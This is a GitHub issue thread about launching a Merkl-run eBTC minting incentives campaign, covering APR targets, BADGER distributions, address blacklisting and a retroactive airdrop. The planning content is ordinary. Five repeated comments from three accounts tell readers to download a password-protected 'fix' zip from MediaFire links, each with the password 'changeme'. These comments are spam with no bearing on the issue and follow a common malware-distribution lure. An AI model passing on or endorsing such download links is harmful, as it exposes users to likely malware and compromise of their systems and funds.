### ISSUE TITLE
Kick-off Merkl Minting Incentives Campaign

### ISSUE THREAD

**Issue by sajanrajdev** [Badger-Finance/badger-multisig#1559]
As decided on [TCD 62](https://forum.badger.finance/t/tcd-62-ebtc-minting-incentives/6324), the Treasury will launch a minting incentives campaign using the ibBTC Multisig rewards. The campaign will use the following parameters:
- Run indefinitely (with active monitoring and re-assessment from the Treasury on performance. Success will be measured in terms of non-treasury eBTC’s Total Supply growth).
- Target a 10% APR with a $30K/month cap
- Distribute BADGER tokens on a bi-weekly basis from the ibBTC rewards multisig
- Distribute the rewards according to the amount of borrowed eBTC (as opposed to the current collateral amount target - this should incentivize supply growth more effectively).
- Won’t require a minimum CDP age since rewards will be distributed in real-time (every 8hrs through Merkl).
- Distribute BADGER retroactively to current minters to ensure continuation from the Lido incentives program, which ended on July 24th. This will be done in accordance to the new program rules.
- Have the ability to blacklist participants (DAO owned CDPs such the treasury’s or the MEV bots).

As per [TCD 65](https://forum.badger.finance/t/tcd-65-outsource-reward-distribution-infra-to-merkl/6327), the distribution has been outsourced to Merkl and it is ready for its use. The proper scripts must be developed to operate the Merkl infra and facilitate the bi-weekly estimation of rewards and distribution to the contracts. In addition, the treasury vault and the MEV bots addresses should be blacklisted from participation. Finally, Merkl agreed to generate the list of qualifying participants and the amounts they should have received retroactively over the period between the end of the previous program and the launch of the new one this week. Upon launching of the new program, the retroactive airdrop must also be conducted.

##  Steps
- [ ] Develop Merkl integration scripts
- [ ] Blacklist Vault and MEV bots
- [ ] Generate Retroactive Airdrop CSV
- [ ] Deposit first round of campaign and deploy the airdrop

**Comment by sajanrajdev** [comment]
To be handled within the eBTC Multisig repo: https://github.com/ebtc-protocol/ebtc-multisig/issues/67

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
